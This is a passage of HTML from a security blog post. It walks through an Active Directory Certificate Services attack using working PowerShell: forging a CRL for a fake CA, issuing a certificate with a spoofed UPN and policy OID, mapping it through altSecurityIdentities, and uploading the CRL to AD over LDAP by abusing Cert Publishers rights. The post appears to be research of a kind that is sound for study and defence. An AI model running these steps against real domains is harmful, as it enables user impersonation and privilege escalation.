#D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $signer<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Crl.Encode()<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">[<\/span><span style=\"color: #D32F2F\">System.IO.File<\/span><span style=\"color: #24292EFF\">]::WriteAllBytes(<\/span><span style=\"color: #22863A\">&quot;fakeca.crl&quot;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">System.Convert<\/span><span style=\"color: #24292EFF\">]::FromBase64String($Crl.RawData()))<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>So the next step would be to publish the signed CRL for our fake CA somewhere &#8211; we could just host a webserver somewhere and include the URL in a newly issued leaf certificate &#8211; It would look something like this:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">Issue certificate with AMA extension and HTTP CDP<\/span><span role=\"button\" tabindex=\"0\" data-code=\"$AmaExtension = New-CertificatePoliciesExtension -Oid &quot;1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402&quot;\n\n$CRLDistInfo = [CERTENClib.CCertEncodeCRLDistInfoClass]::new()\n$CRLDistInfo.Reset(1)\n$CRLDistInfo.SetNameCount(0, 1)\n$CRLDistInfo.SetNameEntry(0, 0, 7, &quot;http:\/\/192.168.1.1\/cdp\/fakeca.crl&quot;)\n$CRLDistInfoB64 = $CRLDistInfo.EncodeBlob([CERTENClib.EncodingType]::XCN_CRYPT_STRING_BASE64)\n$CRLDistInfoExtManaged = [System.Security.Cryptography.X509Certificates.X509Extension]::new(&quot;2.5.29.31&quot;, [Convert]::FromBase64String($CRLDistInfoB64), $false)\n\n $params = @{\n    Type = 'Custom'\n    Subject = 'CN=DEMO5 - fakecaso2'\n    #KeySpec = 'Signature'\n    KeyExportPolicy = 'Exportable'\n    KeyLength = 2048\n    HashAlgorithm = 'sha256'\n    NotAfter = (Get-Date).AddMonths(10)\n    CertStoreLocation = 'Cert:\\CurrentUser\\My'\n    Signer = $signer\n    TextExtension = @(\n     '2.5.29.37={text}1.3.6.1.5.5.7.3.2',\n     '2.5.29.17={text}upn=caso@nttest.chrisse.com')\n    Extension =  $CRLDistInfoExtManaged, $AmaExtension\n}\nNew-SelfSignedCertificate @params\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #24292EFF\">$AmaExtension <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #6F42C1\">New-CertificatePoliciesExtension<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Oid <\/span><span style=\"color: #22863A\">&quot;1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402&quot;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfo <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">CERTENClib.CCertEncodeCRLDistInfoClass<\/span><span style=\"color: #24292EFF\">]::new()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfo.Reset(<\/span><span style=\"color: #1976D2\">1<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfo.SetNameCount(<\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">1<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfo.SetNameEntry(<\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">7<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;http:\/\/192.168.1.1\/cdp\/fakeca.crl&quot;<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfoB64 <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $CRLDistInfo.EncodeBlob([<\/span><span style=\"color: #D32F2F\">CERTENClib.EncodingType<\/span><span style=\"color: #24292EFF\">]::XCN_CRYPT_STRING_BASE64)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfoExtManaged <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">System.Security.Cryptography.X509Certificates.X509Extension<\/span><span style=\"color: #24292EFF\">]::new(<\/span><span style=\"color: #22863A\">&quot;2.5.29.31&quot;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">Convert<\/span><span style=\"color: #24292EFF\">]::FromBase64String($CRLDistInfoB64)<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">$false<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> $params <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">@<\/span><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Type <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;Custom&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Subject <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;CN=DEMO5 - fakecaso2&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    <\/span><span style=\"color: #C2C3C5\">#KeySpec = &#39;Signature&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    KeyExportPolicy <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;Exportable&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    KeyLength <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">2048<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    HashAlgorithm <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;sha256&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    NotAfter <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> (<\/span><span style=\"color: #6F42C1\">Get-Date<\/span><span style=\"color: #24292EFF\">).AddMonths(<\/span><span style=\"color: #1976D2\">10<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    CertStoreLocation <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;Cert:\\CurrentUser\\My&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Signer <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $signer<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    TextExtension <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">@<\/span><span style=\"color: #24292EFF\">(<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">     <\/span><span style=\"color: #22863A\">&#39;2.5.29.37={text}1.3.6.1.5.5.7.3.2&#39;<\/span><span style=\"color: #D32F2F\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">     <\/span><span style=\"color: #22863A\">&#39;2.5.29.17={text}upn=caso@nttest.chrisse.com&#39;<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Extension <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\">  $CRLDistInfoExtManaged<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> $AmaExtension<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #6F42C1\">New-SelfSignedCertificate<\/span><span style=\"color: #24292EFF\"> @params<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Find any user within the forest where you can write to the &#8216;altSecurityIdentities&#8217; attribute<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">Set-AltSecurityIdentities<\/span><span role=\"button\" tabindex=\"0\" data-code=\"$cert  = ls Cert:\\CurrentUser\\my | where { $_.subject -eq &quot;CN=DEMO5 - fakecaso2&quot; }\n.\\Set-AltSecurityIdentities.ps1 -Identity CASO -MappingType IssuerSerialNumber -Certificate $cert\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #24292EFF\">$cert  <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> ls Cert:\\CurrentUser\\my <\/span><span style=\"color: #D32F2F\">|<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">where<\/span><span style=\"color: #24292EFF\"> { <\/span><span style=\"color: #1976D2\">$_.subject<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-eq<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;CN=DEMO5 - fakecaso2&quot;<\/span><span style=\"color: #24292EFF\"> }<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">.<\/span><span style=\"color: #6F42C1\">\\Set-AltSecurityIdentities.ps1<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Identity CASO <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">MappingType IssuerSerialNumber <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Certificate $cert<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>But what if the Domain Controllers (DCs) \/ Key Distribution Centers (KDCs) would block outgoing HTTP traffic to random destination(s) &#8211; well they should.<\/p>\n\n\n\n<p>But what they can&#8217;t block is LDAP access to themselves right? \ud83d\ude42 So let&#8217;s go for an LDAP CDP instead &#8211; hm but wait we only have the power of being &#8216;Cert Publishers&#8217; through the SYSTEM context of &#8216;Issuing CA 2&#8217; &#8211; turns out that might be a probelm.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"633\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/ldpCDP-1024x633.png\" alt=\"\" class=\"wp-image-1256\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/ldpCDP-1024x633.png 1024w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/ldpCDP-300x185.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/ldpCDP-768x475.png 768w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/ldpCDP.png 1414w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p>It turn&#8217;s out that &#8216;Cert Publishers&#8217; have Full Control on any sub-container created as part of every Enterprise CA installation, let&#8217;s use that \ud83d\ude42<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">Upload CRL signed by FakeCA to AD<\/span><span role=\"button\" tabindex=\"0\" data-code=\"using namespace System.DirectoryServices.Protocols\n\n$Assembly = &quot;System.DirectoryServices.Protocols&quot;\nTry\n{\nAdd-Type -AssemblyName $Assembly -ErrorAction Stop\n}\nCatch\n{\n\nthrow\n}\n# Connect to $ForestDomainName\n$Identifier = [LdapDirectoryIdentifier]::new($ForestDomainName, 389, $false, $false)\n$Ldap = [LdapConnection]::new($Identifier, $null, [AuthType]::Kerberos)\n$Ldap.AutoBind = $false\n$Ldap.ClientCertificates.Clear()\n$SessionOptions = $Ldap.SessionOptions\n$SessionOptions.LocatorFlag = [LocatorFlags]::WriteableRequired -bor [LocatorFlags]::DirectoryServicesRequired -bor [LocatorFlags]::ForceRediscovery\n$SessionOptions.Signing = $true\n$SessionOptions.Sealing = $true\n$SessionOptions.ProtocolVersion = 3\n$SessionOptions.ReferralChasing = [ReferralChasingOptions]::None\n\nTry\n{\n$Ldap.Bind()\n}\nCatch\n{\n\nthrow\n}\n\n# Get configurationNamingContext\n$ConfigNamingContext = &quot;configurationNamingContext&quot;\n\n$RootDseSearchRequest = [SearchRequest]::new([String]::Empty, &quot;(&amp;(objectClass=*))&quot;, [SearchScope]::Base, $ConfigNamingContext)\nTry\n{\n$RootDseSearchResponse = [SearchResponse]$Ldap.SendRequest($RootDseSearchRequest)\n}\nCatch\n{\n\nthrow\n}\nIf ($RootDseSearchResponse.Entries.Count -eq 0)\n{\n\nthrow\n}\n$RootDse = $RootDseSearchResponse.Entries[0]\n\nIf (!$RootDse.Attributes.Contains($ConfigNamingContext))\n{\n\nthrow\n}\n$CDPLocation = &quot;&quot;\n$CASubject = &quot;CN=Chrisse Root CA&quot;\n$Configuration = $RootDse.Attributes[$ConfigNamingContext][0]\n\n$searchRequest = [SearchRequest]::new([String]::Format(&quot;CN=CDP,CN=Public Key Services,CN=Services,{0}&quot;, $Configuration), &quot;(objectClass=cRLDistributionPoint)&quot;, [SearchScope]::Subtree, &quot;objectClass&quot;)\n\n$searchResponse = $ldap.SendRequest($searchRequest);\n\nif ($searchResponse.Entries.Count -eq 0)\n{\nthrow\n}\nforeach($entry in $searchResponse.Entries)\n{\nif($entry.DistinguishedName.StartsWith($CASubject, [System.StringComparison]::CurrentCultureIgnoreCase))\n{\n$CDPContainer = $entry.DistinguishedName.IndexOf(',') +1\n$CDPLocation = $entry.DistinguishedName.Substring($CDPContainer)\n}\n}\n\nif ($CDPLocation -eq &quot;&quot;)\n{\n$CDPContainer = $searchResponse.Entries[0].DistinguishedName.IndexOf(',') +1\n$CDPLocation = $searchResponse.Entries[0].DistinguishedName.Substring($CDPContainer)\n}\n\n#Load the CRL created and signed earlier from file\n$CrlBytes = [System.IO.File]::ReadAllBytes(&quot;fakeca.crl&quot;)\n\n$addRequest = [AddRequest]::new([String]::Format(&quot;$CASubject,{0}&quot;, $CDPLocation),\n\n[DirectoryAttribute]::new(&quot;objectClass&quot;, &quot;cRLDistributionPoint&quot;),\n[DirectoryAttribute]::new(&quot;certificateRevocationList&quot;,$CrlBytes)\n\n)\n$addResponse = $ldap.SendRequest($addRequest)\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #D32F2F\">using<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">namespace<\/span><span style=\"color: #24292EFF\"> System.DirectoryServices.Protocols<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Assembly <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;System.DirectoryServices.Protocols&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">Try<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #6F42C1\">Add-Type<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">AssemblyName $Assembly <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">ErrorAction Stop<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">Catch<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">throw<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C2C3C5\"># Connect to $ForestDomainName<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Identifier <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">LdapDirectoryIdentifier<\/span><span style=\"color: #24292EFF\">]::new($ForestDomainName<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">389<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">$false<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">$false<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Ldap <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">LdapConnection<\/span><span style=\"color: #24292EFF\">]::new($Identifier<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">$null<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">AuthType<\/span><span style=\"color: #24292EFF\">]::Kerberos)<\/span><\/span>\n<span class=\"line cbp-see-more-line \"><span style=\"color: #24292EFF\">$Ldap.AutoBind <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">$false<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Ldap.ClientCertificates.Clear()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$SessionOptions <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $Ldap.SessionOptions<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$SessionOptions.LocatorFlag <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">LocatorFlags<\/span><span style=\"color: #24292EFF\">]::WriteableRequired <\/span><span style=\"color: #D32F2F\">-bor<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">LocatorFlags<\/span><span style=\"color: #24292EFF\">]::DirectoryServicesRequired <\/span><span style=\"color: #D32F2F\">-bor<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">LocatorFlags<\/span><span style=\"color: #24292EFF\">]::ForceRediscovery<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$SessionOptions.Signing <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">$true<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$SessionOptions.Sealing <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">$true<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$SessionOptions.ProtocolVersion <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">3<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$SessionOptions.ReferralChasing <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">ReferralChasingOptions<\/span><span style=\"color: #24292EFF\">]::None<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">Try<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Ldap.Bind()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">Catch<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">throw<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #C2C3C5\"># Get configurationNamingContext<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$ConfigNamingContext <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;configurationNamingContext&quot;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$RootDseSearchRequest <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">SearchRequest<\/span><span style=\"color: #24292EFF\">]::new([<\/span><span style=\"color: #D32F2F\">String<\/span><span style=\"color: #24292EFF\">]::Empty<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;(&amp;(objectClass=*))&quot;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">SearchScope<\/span><span style=\"color: #24292EFF\">]::Base<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> $ConfigNamingContext)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">Try<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$RootDseSearchResponse <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">SearchResponse<\/span><span style=\"color: #24292EFF\">]$Ldap.SendRequest($RootDseSearchRequest)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">Catch<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">throw<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">If<\/span><span style=\"color: #24292EFF\"> ($RootDseSearchResponse.Entries.Count <\/span><span style=\"color: #D32F2F\">-eq<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">throw<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$RootDse <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $RootDseSearchResponse.Entries[<\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #24292EFF\">]<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">If<\/span><span style=\"color: #24292EFF\"> (<\/span><span style=\"color: #D32F2F\">!<\/span><span style=\"color: #24292EFF\">$RootDse.Attributes.Contains($ConfigNamingContext))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">throw<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CDPLocation <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CASubject <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;CN=Chrisse Root CA&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Configuration <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $RootDse.Attributes[$ConfigNamingContext][<\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #24292EFF\">]<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$searchRequest <\/span><span 